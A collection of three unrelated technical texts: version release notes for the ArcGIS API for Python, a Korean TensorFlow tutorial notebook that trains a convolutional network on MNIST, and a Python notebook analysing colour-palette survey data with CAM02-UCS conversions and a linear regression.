* Added ability to [`Replace Service`](https://developers.arcgis.com/rest/users-groups-and-items/replace-service.htm) on the [`ContentManager`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#contentmanager) to
* Added ability to protect a [`group`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Group) from being deleted
* Added support for `Personal Information Exchange` files(.pfx) as the value for `cert_file` parameter to the [`GIS`](http://zion/jenkins/job/geosaurus_master/builds=master/PythonAPIDoc/) class for PKI implementations
* Improved error messaging with invalid credentials and valid `cert_file` logins
* Added module to support [`Workforce for ArcGIS`](https://workforce.arcgis.com/)
* Added query and download_all functionality to [`Attachment Manager`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.managers.html#arcgis.features.managers.AttachmentManager)
* Added documentation on the [`update_properties()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html?highlight=update_properties#arcgis.gis.GIS.update_properties) function
* Added `shared_with` property to [`Item`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html?highlight=update_properties#item) class to determine how an item has been [shared](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html?highlight=update_properties#item)
* Updated the [`datastore.validate()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html?highlight=update_properties#arcgis.gis.Datastore.validate) function
* Improved performance on [`clone_items()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html?highlight=update_properties#arcgis.gis.ContentManager.clone_items) when querying attachments
* Added `content_discovery` property to [`System`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.admin.html#system) resource for enabling/disabling external discovery of portal content
* Added a `copy()` function to the [`Item`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html?highlight=update_properties#item) class to derive a new item based on current item
* Updated output from the [`get_samples()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.toc.html#arcgis.raster.ImageryLayer.get_samples) function
* Added documentation for geoprocessing tools to [`arcgis.features.analysis`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.analysis.html#module-arcgis.features.analysis) module
* Updated [`UserManager.search()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.UserManager.search) function when specifying roles
* Added `OfflineMapAreaManager` object to the [`arcgis.mapping`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.mapping.html) module to support managing [`offline_areas`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.mapping.html#arcgis.mapping.WebMap.offline_areas)
* Added ability to add items from cloud content storage using the `dataUrl` and `filename` parameters on the [`ContentManager.add()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.ContentManager.add) function
#### Fixes
* Fixed issue where [`group.update()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Group.update) did not properly update the group
* Fixed issue in [`clone_items`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.ContentManager.clone_items) function where Web App Builder Applications were not cloning correctly
* Removed errant warnings from [`group.reassign_to()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Group.reassign_to) function
* Fixed issue where `geometry` objects were preventing discovery of duplicate records
* Fixed issue on [`Attachment Manager`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.managers.html#arcgis.features.managers.AttachmentManager) for attachments over 9MB
* Fixed issue on [`Attachment Manager`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.managers.html#arcgis.features.managers.AttachmentManager) where input was ignored if [`global id()`] was not used
* Fixed issue where a geometry filter crashed the [`SyncManager.create()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.managers.html#arcgis.features.managers.SyncManager.create) method
* Fixed issue where the [`featurelayer.query()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#arcgis.features.FeatureLayer.query) method constructed a faulty request when using the `return_distinct_values` parameter
* Fixed issue where [`convex_hull()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geometry.html#convex-hull) returned incorrect geometry
* Fixed issue where [`update_item()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Item.update) failed if text exceeded 32767 characters
* Fixed issue that prevented publishing [`scene layer package`](http://pro.arcgis.com/en/pro-app/help/sharing/overview/scene-layer-package.htm) items with [`gis.item.publish()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Item.publish)
* Fixed error in [`clone_items()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html?highlight=update_properties#arcgis.gis.ContentManager.clone_items) function handling of [`MapService`](http://enterprise.arcgis.com/en/server/latest/publish-services/linux/what-is-a-map-service.htm) paths
* Fixed error when using [`pip`] to install `arcgis` on Windows machines without Anaconda
* Fixed intermittent problem when storing multiple users on the same portal in a [`profile`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.GIS) file
* Fixed issue with incorrect `role` information returned by [`UserManager.search()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.UserManager.search)
* Fixed issue with [`WebMap.remove_layers()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.widgets.html#arcgis.widgets.MapView.remove_layers) to handle duplicate layers
# What's new in version 1.4
#### New
* Added full capabilities to install ```arcgis``` package with [```pip```](https://pip.pypa.io/en/stable/)
* Added ```Upload Manager``` to aid in [upload](https://developers.arcgis.com/rest/services-reference/upload.htm") operations to the server
* Added [```shapely```](https://toblerity.org/shapely/manual.html) support to the [```Spatial DataFrame```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#spatialdataframe)
* Added ```is_empty``` property for checking ```geometry```
* Added support for [```GeoJSON```](http://geojson.org/) [```LineStrings```](https://tools.ietf.org/html/rfc7946#section-3.1.4), and [```Polygons```](https://tools.ietf.org/html/rfc7946#section-3.1.6)
* Added support for [```Operations Views```](https://doc.arcgis.com/en/operations-dashboard/operation-views/)s and [```Dashboards```](https://docs.arcgis.com/en/operations-dashboard/help/what-is-a-dashboard.htm) to ```clone_items``` function on ```Content Manager```
* Added ability to ```Content Manager``` to [```search```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.ContentManager.search) for [```map image layers```](http://pro.arcgis.com/en/pro-app/help/sharing/overview/map-image-layer.htm)
* Enhanced [```Map Image Layer.export()```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.mapping.html#arcgis.mapping.MapImageLayer.export_map") to output image and kmz formats
* Added ability to export data from non-hosted ```feature layer``` to Excel
* Added support for multiple profiles persisted in the [.```arcgisprofile```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#gis")
* Added ability to plot a [```GeoSeries```](http://geopandas.org/data_structures.html) (See [```Spatial DataFrame```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.html?highlight=geoseries#arcgis-features-spatialdataframe) with suite of symbology and rendering options
* Added [```admin```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.admin.html) functionality for Portal users with [```publisher```](https://enterprise.arcgis.com/en/portal/latest/administer/linux/roles.htm) privileges
* Added ```output_cellsize``` parameter to [```resample```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.html#resample") raster function
* Added ability to read list of ```Feature Layers``` to [```FeatureLayerCollectionManager.create_view```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.managers.html#arcgis.features.managers.FeatureLayerCollectionManager.create_view") method
* Added ability to register SDE Connection Files as a data store
* Improved performance when ```cloning``` items
* Added parameters to ```user.update()``` method to accept first and last names as input
* Added ```distanceSplit``` and ```distanceSplitUnit``` parameters to [```GeoAnalytics.reconstruct_tracks```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.summarize_data.html#reconstruct-tracks") function
* Added ```cellSize```, ```cellSizeUnits```, and ```shapeType``` parameters to [```features.analyze_patterns.find_hot_spot```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.analyze_patterns.html#find-hot-spots") function
* Added support for Content Categories for portal items
* Added ability to convert Rasters to Features with [```ImageryLayer.to_features()```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.toc.html#arcgis.raster.ImageryLayer.to_features") function
* Added [```draw_graph```] function to [```ImageryLayer```]() objects for for visualizing Raster function workflows
* Added support for additional rasters as inputs to [```raster functions```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.html")
* Added additional rendering support to [```MapView```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.widgets.html#mapview"> and [```FeatureLayer```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#featurelayer)" objects
* Added ```users_update_items``` parameter to [```GroupManager.create()```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.GroupManager.create") to allow members to update all items in group
* Added ```token``` parameter to [```GIS```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.GIS") for logging into GIS from external contexts
* Enhanced automation of creating users with ```security_question``` parameter to ```user.update()``` method
* Added support for [```MapImageLayer```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.mapping.html#arcgis.mapping.MapImageLayer) to [```map.add_layer()```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.widgets.html#arcgis.widgets.MapView.add_layer) method
#### Fixes
* ```Group.add_user``` method will accept ```user``` objects or a ```string``` representing username as input.
* Updated date handling and integer types available on the ```Spatial DataFrame```
* Fixed issue where mixed-content layers were failing when using the [```map widget```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.GIS.map")
* Fixed issue where ```FeatureSet.df``` was not properly setting the spatial reference
* Detailed warnings issued exporting layer with [```global function```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.gbl.html") in the function chain
* Fixed issue where PNG files referenced in thumbnail parameter on [```user.update()```]() method raised an exception
* Fixed error when drawing [```FeatureCollections```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#featurecollection") with ```datetime``` fields
* Fixed bug where ```ContentManager.import_data()``` returned error if Pandas dataframe did not contain addresses
* Fixed bug when using ```SpatialDataFrame.to_featurelayer()``` method for environments lacking ```ArcPy``` site-package
* Fixed issue where [```time-enabled hosted feature layers```](http://desktop.arcgis.com/en/arcmap/10.5/map/time/serving-time-aware-layers.htm) failed to clone to portal items
* Fixed projection issue when using ```SpatialDataFrame.to_featureclass()``` method when ```ArcPy``` site-package not present
* Fixed problem with [```Geoenrichment.Country.subgeographies```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoenrichment.html#arcgis.geoenrichment.Country.subgeographies) queries not returning results
* Fixed handling of ```NoneType``` responses for Geoprocessing service requests
* Fixed bug where [```user.update_level()```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html?highlight=user%20update_level#arcgis.gis.User.update_level) method was not changing level of user
* Added missing parameters to [```raster.classify```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.html#classify) function
* Fixed errors when writing dates to feature attributes
# What's new in version 1.3
#### New
- Added support to render and work with Vector Tile Layers in `arcgis.mapping` module with a new `VectorTileLayer` class.
- Added ability to add text and archives as resource files to Items.
- Added a `find_outliers` task to the `arcgis.features.analysis` module to locate features and clusters that differ significantly
- Added support for [Living Atlas](https://livingatlas.arcgis.com/en/#s=0) Content
- Added ability to select layers to add when creating new feature service from `FeatureLayerCollection` item
- Added `detect_track_incidents` tool to the `arcgis.geoanalytics.find_locations` module
- Added support for unfederated ArcGIS Server instances from the `arcgis.gis.server` module
- Added ability to cancel Geoprocessing jobs with keyboard
- Added ability to publish map services from Geoanalytics results for visualizing large spatiotemporal feature services
- Added ability to login with a [public account](https://www.arcgis.com/home/signin.html) to [ArcGIS Online](https://www.arcgis.com)
- Added support for Dynamic Map Image Layers
- Enhanced search capabilities to look for specific [categories](https://developers.arcgis.com/python/guide/understanding-geocoders/#categories-property)
- Added ability to create `Features` from and convert features to [geojson](http://geojson.org/)
- Improved spatial refernce support when using [`arcgis.features.SpatialDataFrame`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#spatialdataframe)
- Improved function to export `SpatialDataFrame` by checking for required modules
- Improved performance when creating `Imagery Layers`
- Added new functions to `raster.functions` module. See [**here**](https://desktop.arcgis.com/en/arcmap/latest/manage-data/raster-and-images/what-are-the-functions-used-by-a-raster-or-mosaic-dataset.htm) for function details
- `complex` - computes magnitude from an input raster with complex pixel types
- `colormap_to_rgb` - converts a single-band raster with a colormap to three-band raster
- `statistics_histogram` - defines the statistics and histogram of a raster to help render output
- `tasseled_cap` - analyzes certain multispectral datasets and calculates new bands useful to map vegetation and urban developmet changes
- `identity` - default function required in a [mosaic dataset](http://desktop.arcgis.com/en/arcmap/latest/manage-data/raster-and-images/what-is-a-mosaic-dataset.htm) if there is no other function
- `colorspace_converstion` - converts the color model of a three-band unsigned 8-bit images from HSV or RGB, or vice versa
- `grayscale` - converts a multi-band image into a single-band grayscale image
- `pansharpen` - enhances spatial resolution of a multi-band image by fusing with higher-resolution panchromatic image
- `spectral_conversion` - applies a matrix to affect the spectral values output by a multi-band image
- `raster_calculator` - allows you to call all existing math functions for building expressions
- `speckle` - filters a speckled radar dataset to smooth out noise
- Added a new [`GeoEnrichment`](http://resources.arcgis.com/en/help/arcgis-rest-api/#/The_GeoEnrichment_service/02r30000021r000000/) module
- Added ability to set and configure the identity provider for managing user credentials
- Added support for passing geometry columns into [`PySal`](http://pysal.readthedocs.io/en/latest/users/introduction.html) functions
- Added a new `esri_access` property to [`User`](http://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#user) objects so Esri training materials could be accessed
- Added support for feeding `SpatialDataFrame` objects to [`GeoProcessing`](http://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoprocessing.html) tools
- A new `SpatialDataFrame.plot()` method to do bar, line and scatterplots
- Added support for multi-part [`Polygon`](http://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geometry.html#polygon) geometries in `FeatureSet` objects
- Added support for creating [`Hosted Feature Layer Views`](https://doc.arcgis.com/en/arcgis-online/share-maps/create-hosted-views.htm)
- Added support for cloning items directly from the [`ContentManager`](http://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#contentmanager)
- Added ability to directly [read, write and author Web Maps](/python/guide/working-with-web-maps-and-web-scenes/) from [`arcgis.mapping.WebMap`](http://esri.github.io/arcgis-python-api/apidoc/html/arcgis.mapping.html#webmap) objects
- Added support for High Performance on `geocoding` and `geoanalytics`
- Added `geocode_locations` tool in `arcgis.geoanalytics.find_locations` module
- Added functionality to the [`ReconstructTracks`](http://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.summarize_data.html#reconstruct-tracks) and [`JoinFeatures`](http://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.summarize_data.html#join-features) in the `arcgis.geoanalytics.summarize_data` module
- Added support for setting content status on [`Item`](http://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#item) objects
#### Fixes
- BUG-00010973 Using the "services.list()" function fails with Traceback error
- BUG-000105897 When iterating over items from a non-existent folder, the Python API iterates over the ArcGIS Online root folder
- BUG-000105969 When creating replicas, a json data format replica was not being created in the output directory
- BUG-000109342 Errow when importing premium toolboxes using `geoprocessing.import_toolbox` function
- Fixed `FeatureSet` issue so geometry type is set properly
- Fixed issue where new datastores were not being returned from the `servers.datastores.list()` method
- Fixed issue where querying a `FeatureLayer` with `returnIDsOnly`, `returnCountOnly`, and `returnIdsOnly` were not returning all records
- Fixed issue where publishing from service definition files was not placing service items in folders
- Fixed issue where no error was reported when creating a big data file share using an invalid path
- Fixed issue when using the defaults for the `arcgis.admin.System.reindex` function
- Fixed issue where `publish_sd()` function to publish from service definition files was not available
- Fixed issue where Python API tried to use ArcGIS Online basemaps in a disconnected environment
- Improved ability to save `Features` in non-English data
- Fixed issue where creating a `SpatialDataFrame` from a feature class was not importing spatial reference correctly
- Improved security on anonymous connections to ArcGIS Online
- Fixed security issue using NTLM and Kerberos works with Python 3.6.1
- Improved performance for download of Python API
- Fixed issue where geometry extents were not properly returned which affected some projecting operations
- Fixed issue where fields over 255 characters in length were not properly created
- Fixed issue when updating the large thumbnail on an item the image was not updating to the proper type
# What's new in version 1.2.4
A number of quality improvements were made in versions 1.2.3 and 1.2.4. Below is the list of bugs reported to Technical Support that were fixed:
- BUG-000108063 ArcGIS Python API is unable to connect to Portal for ArcGIS with Integrated Windows Authentication configured.
- BUG-000107899 In the ArcGIS Python API, cannot update the ArcGIS Online organization banner using the set_banner method when using a custom html string.
- Added support for using the API behind proxy servers
# What's new in version 1.2.2
Version 1.2.2 ensures the map widget in Jupyter notebooks continues to work with newer installs of the API.
# What's new in version 1.2.1
Version `1.2.1` is a primarily a bug fix and documentation update release. Below is a non exhaustive list of bug fixes that were fixed:
- Fix to ensure `DataStoreManager.list()` is updated when user adds, modifies or updates data stores.
- BUG-000104664 ArcGIS API for Python fails to return the groupProviderName value
- BUG-000105897 When iterating through items in a nonexistent folder using the ArcGIS Python API, items from the ArcGIS Online root folder are returned.
- BUG-000105969 In ArcGIS Python API, using `replicas.create()` and `data_format = 'json'` is not able to create output in local directory when out_path is defined.
- ENH-000106710 Automate the creation of Enterprise groups in ArcGIS Online and Portal using the ArcGIS API for Python.
- Support for Living Atlas on ArcGIS Enterprise
- Better error messages
- BUG-000104664 ArcGIS API for Python fails to return the `groupProviderName` value.
- BUG-000105270 `returnAttachments` is an invalid parameter and is repeated multiple times in the `arcgis.features.managers` module reference page for the Python API
- Support for `find_outliers` tool
- Support to add Item resources as text, URL and archive
- Geocoding results can be returned as `FeatureSet` objects.
- Support for publishing hosted tile layers from feature layers
- Documentation for administering your GIS, administering your ArcGIS servers, building a distributed GIS, customizing your GIS look and feel are added.
# What's new in version 1.2.0
Version 1.2 brings with it a slew of new capabilities. Below is a non exhaustive list of enhancements
- A new `arcgis.gis.admin` sub module -- expands your admin capabilities, manage credits, create gis collaborations to build a distributed GIS, modify the user experience of the portal website
- A new `arcgis.gis.server` sub module -- allows you to manage servers federated with your ArcGIS Enterprise
- A new `arcgis.raster.functions` sub module for raster functions -- express raster functions as Python functions, chain them together and perform raster algebra using regular Python arithmetic operators
- A new `SpatialDataFrame` class which extends your regular Pandas DataFrame with spatial capabilities and ability to work with local datasets
- Feature layer improvements -- overwrite feature layers, better support for attachments
- Map widget enhancements -- disable zoom when scrolling the notebook
- oAuth login using app id, secret
- A new GeoAnalytics tool to create space-time cubes
# What's new in version 1.0.1
Version 1.0.1 is a bug fix release. Following are some of the bugs that were resolved:
* BUG-000101507 gis.groups.search returns incorrect results if the User is an owner of more than 100 groups.
* Enabled building initial cache when publishing vector tile packages
* Fixed bug in creating new users on ArcGIS Online or Portal for ArcGIS 10.5 or newer
* Fix to ignore values like size of -1 when initializing item objects
* Reorder batch geocoding results to match input array
# What's new in version 1.0.0
Ever since we released the public beta versions, your response to this API has been phenomenal. Since the last release of beta 3, the API went through a redesign phase. We took a critical look at the previous design and evaluated it against the ease of use, extensibility and our original goal of developing a Pythonic API for GIS. The result is this new design, a design that simply does not contour to the implementation logic, but efficiently abstracts it, ensuring the simplicity and beauty of the programming language prevails.
## API design changes
The following are some of the high level changes you would notice in the version 1.0 of the API. You might have to update your notebooks and scripts and we apologize for this inconvenience.
* Various layer types in `arcgis.lyr` module are now in their own separate modules such as `arcgis.features`, `arcgis.raster`, `arcgis.network` etc.
* `arcgis.viz` is now `arcgis.mapping` with additional support for vector tiles, map image layers
* Tools in `arcgis.tools` are accessible as functions in the corresponding layer modules. This allows a better grouping and presentation of tools making them available right alongside the layer types they process. For instance, the feature analysis tools available earlier as `arcgis.tools.FeatureAnalysisTools` is now `arcgis.features.analyze_patterns`, `arcgis.features.enrich_data` etc.
* Big data analysis tools available earlier as `arcgis.tools.BigData` is now in a separate module `arcgis.geoanalytics`.
## Enhancements and new features
This is by no means an exhaustive list. Below are some major enhancements you may notice in version 1.0 of the API
* ability to work with replicas for feature layers
* ability to manage user roles
* support for multiple outputs in GP tools
* support for stream layers
* added more big data analysis tools in the `arcgis.geoanalytics` module
* extended support for web tools
* smart mapping improvements
* extended ability to publish package items such as vector tile, scene, tile
* enhanced support for login using ArcGIS Pro
| github_jupyter |
##### Copyright 2019 The TensorFlow Authors.
```
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
```
# 합성곱 신경망
<table class="tfo-notebook-buttons" align="left">
<td>
<a target="_blank" href="https://www.tensorflow.org/tutorials/images/cnn">
<img src="https://www.tensorflow.org/images/tf_logo_32px.png" />
TensorFlow.org에서 보기</a>
</td>
<td>
<a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs-l10n/blob/master/site/ko/tutorials/images/cnn.ipynb">
<img src="https://www.tensorflow.org/images/colab_logo_32px.png" />
구글 코랩(Colab)에서 실행하기</a>
</td>
<td>
<a target="_blank" href="https://github.com/tensorflow/docs-l10n/blob/master/site/ko/tutorials/images/cnn.ipynb">
<img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />
깃허브(GitHub) 소스 보기</a>
</td>
<td>
<a href="https://storage.googleapis.com/tensorflow_docs/docs-l10n/site/ko/tutorials/images/cnn.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
</td>
</table>
Note: 이 문서는 텐서플로 커뮤니티에서 번역했습니다. 커뮤니티 번역 활동의 특성상 정확한 번역과 최신 내용을 반영하기 위해 노력함에도
불구하고 [공식 영문 문서](https://www.tensorflow.org/?hl=en)의 내용과 일치하지 않을 수 있습니다.
이 번역에 개선할 부분이 있다면
[tensorflow/docs-l10n](https://github.com/tensorflow/docs-l10n/) 깃헙 저장소로 풀 리퀘스트를 보내주시기 바랍니다.
문서 번역이나 리뷰에 참여하려면
[docs-ko@tensorflow.org](https://groups.google.com/a/tensorflow.org/forum/#!forum/docs-ko)로
메일을 보내주시기 바랍니다.
이 튜토리얼은 MNIST 숫자를 분류하기 위해 간단한 [합성곱 신경망](https://developers.google.com/machine-learning/glossary/#convolutional_neural_network)(Convolutional Neural Network, CNN)을 훈련합니다. 간단한 이 네트워크는 MNIST 테스트 세트에서 99% 정확도를 달성할 것입니다. 이 튜토리얼은 [케라스 Sequential API](https://www.tensorflow.org/guide/keras)를 사용하기 때문에 몇 줄의 코드만으로 모델을 만들고 훈련할 수 있습니다.
노트: GPU를 사용하여 CNN의 훈련 속도를 높일 수 있습니다. 코랩에서 이 노트북을 실행한다면 * 수정 -> 노트 설정 -> 하드웨어 가속기* 에서 GPU를 선택하세요.
### 텐서플로 임포트하기
```
!pip install tensorflow-gpu==2.0.0-rc1
import tensorflow as tf
from tensorflow.keras import datasets, layers, models
```
### MNIST 데이터셋 다운로드하고 준비하기
```
(train_images, train_labels), (test_images, test_labels) = datasets.mnist.load_data()
train_images = train_images.reshape((60000, 28, 28, 1))
test_images = test_images.reshape((10000, 28, 28, 1))
# 픽셀 값을 0~1 사이로 정규화합니다.
train_images, test_images = train_images / 255.0, test_images / 255.0
```
### 합성곱 층 만들기
아래 6줄의 코드에서 [Conv2D](https://www.tensorflow.org/api_docs/python/tf/keras/layers/Conv2D)와 [MaxPooling2D](https://www.tensorflow.org/api_docs/python/tf/keras/layers/MaxPool2D) 층을 쌓는 일반적인 패턴으로 합성곱 층을 정의합니다.
CNN은 배치(batch) 크기를 제외하고 (이미지 높이, 이미지 너비, 컬러 채널) 크기의 텐서(tensor)를 입력으로 받습니다. MNIST 데이터는 (흑백 이미지이기 때문에) 컬러 채널(channel)이 하나지만 컬러 이미지는 (R,G,B) 세 개의 채널을 가집니다. 이 예에서는 MNIST 이미지 포맷인 (28, 28, 1) 크기의 입력을 처리하는 CNN을 정의하겠습니다. 이 값을 첫 번째 층의 `input_shape` 매개변수로 전달합니다.
```
model = models.Sequential()
model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1)))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
```
지금까지 모델의 구조를 출력해 보죠.
```
model.summary()
```
위에서 Conv2D와 MaxPooling2D 층의 출력은 (높이, 너비, 채널) 크기의 3D 텐서입니다. 높이와 너비 차원은 네트워크가 깊어질수록 감소하는 경향을 가집니다. Conv2D 층에서 출력 채널의 수는 첫 번째 매개변수에 의해 결정됩니다(예를 들면, 32 또는 64). 일반적으로 높이와 너비가 줄어듦에 따라 (계산 비용 측면에서) Conv2D 층의 출력 채널을 늘릴 수 있습니다.
### 마지막에 Dense 층 추가하기
모델을 완성하려면 마지막 합성곱 층의 출력 텐서(크기 (4, 4, 64))를 하나 이상의 Dense 층에 주입하여 분류를 수행합니다. Dense 층은 벡터(1D)를 입력으로 받는데 현재 출력은 3D 텐서입니다. 먼저 3D 출력을 1D로 펼치겠습니다. 그다음 하나 이상의 Dense 층을 그 위에 추가하겠습니다. MNIST 데이터는 10개의 클래스가 있으므로 마지막에 Dense 층에 10개의 출력과 소프트맥스 활성화 함수를 사용합니다.
```
model.add(layers.Flatten())
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(10, activation='softmax'))
```
최종 모델의 구조를 확인해 보죠.
```
model.summary()
```
여기에서 볼 수 있듯이 두 개의 Dense 층을 통과하기 전에 (4, 4, 64) 출력을 (1024) 크기의 벡터로 펼쳤습니다.
### 모델 컴파일과 훈련하기
```
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(train_images, train_labels, epochs=5)
```
### 모델 평가
```
test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)
print(test_acc)
```
결과에서 보듯이 간단한 CNN 모델이 99%의 테스트 정확도를 달성합니다. 몇 라인의 코드치고 나쁘지 않네요! (케라스의 서브클래싱 API와 GradientTape를 사용하여) CNN을 만드는 또 다른 방법은 [여기](https://github.com/tensorflow/docs-l10n/blob/master/site/ko/tutorials/quickstart/advanced.ipynb)를 참고하세요.
| github_jupyter |
```
import sqlite3
import numpy as np
import colorspacious
from sklearn import linear_model
ALL_NUM_COLORS = [6, 8, 10]
DB_FILE = "../survey-results/results.db"
def to_rgb_jab(color):
"""
Convert hex color code (without `#`) to sRGB255 and CAM02-UCS.
"""
rgb = [(int(i[:2], 16), int(i[2:4], 16), int(i[4:], 16)) for i in color]
jab = [colorspacious.cspace_convert(i, "sRGB255", "CAM02-UCS") for i in rgb]
return np.array(rgb), np.array(jab)
# Load survey data
data_rgb = {}
data_jab = {}
targets = {}
min_count = 1e10
conn = sqlite3.connect(DB_FILE)
c = conn.cursor()
for num_colors in ALL_NUM_COLORS:
count = 0
data_jab[num_colors] = []
data_rgb[num_colors] = []
targets[num_colors] = []
for row in c.execute(
f"SELECT c1, c2, sp FROM picks WHERE length(c1) = {num_colors * 7 - 1}"
):
count += 1
# Convert to Jab [CAM02-UCS based]
rgb1, jab1 = to_rgb_jab(row[0].split(","))
rgb2, jab2 = to_rgb_jab(row[1].split(","))
# Add to data arrays
data_rgb[num_colors].append(np.array((rgb1, rgb2)).flatten())
data_jab[num_colors].append(np.array((jab1, jab2)).flatten())
targets[num_colors].append(row[2] - 1)
data_rgb[num_colors] = np.array(data_rgb[num_colors])
data_jab[num_colors] = np.array(data_jab[num_colors])
targets[num_colors] = np.array(targets[num_colors])
min_count = min(min_count, count)
print(num_colors, count)
conn.close()
stats1 = {}
stats2 = {}
stats = [np.mean, np.min, np.max]
for stat in stats:
stats1["c" + stat.__name__] = np.array([])
stats2["c" + stat.__name__] = np.array([])
for stat in stats:
stats1["l" + stat.__name__] = np.array([])
stats2["l" + stat.__name__] = np.array([])
for nc in ALL_NUM_COLORS:
tmp1 = data_jab[nc][:, : nc * 3].reshape((data_jab[nc].shape[0], nc, 3))
tmp2 = data_jab[nc][:, nc * 3 :].reshape((data_jab[nc].shape[0], nc, 3))
for stat in stats:
c1 = stat(np.sqrt(tmp1[:, :, 1] ** 2 + tmp1[:, :, 2] ** 2), axis=1)
c2 = stat(np.sqrt(tmp2[:, :, 1] ** 2 + tmp2[:, :, 2] ** 2), axis=1)
stats1["c" + stat.__name__] = np.append(stats1["c" + stat.__name__], c1)
stats2["c" + stat.__name__] = np.append(stats2["c" + stat.__name__], c2)
print(
f" {stat.__name__} chroma {nc:2d}: {np.mean((c1 > c2) ^ targets[nc]):.3f}"
)
l1 = stat(tmp1[:, :, 0], axis=1)
l2 = stat(tmp2[:, :, 0], axis=1)
stats1["l" + stat.__name__] = np.append(stats1["l" + stat.__name__], l1)
stats2["l" + stat.__name__] = np.append(stats2["l" + stat.__name__], l2)
print(
f"{stat.__name__} lightness {nc:2d}: {np.mean((l1 > l2) ^ targets[nc]):.3f}"
)
reg = linear_model.LinearRegression()
tmp = (np.array(list(stats1.values())) - np.array(list(stats2.values()))).T
reg.fit(tmp, np.concatenate(list(targets.values())))
coef_sum = np.sum(np.abs(reg.coef_))
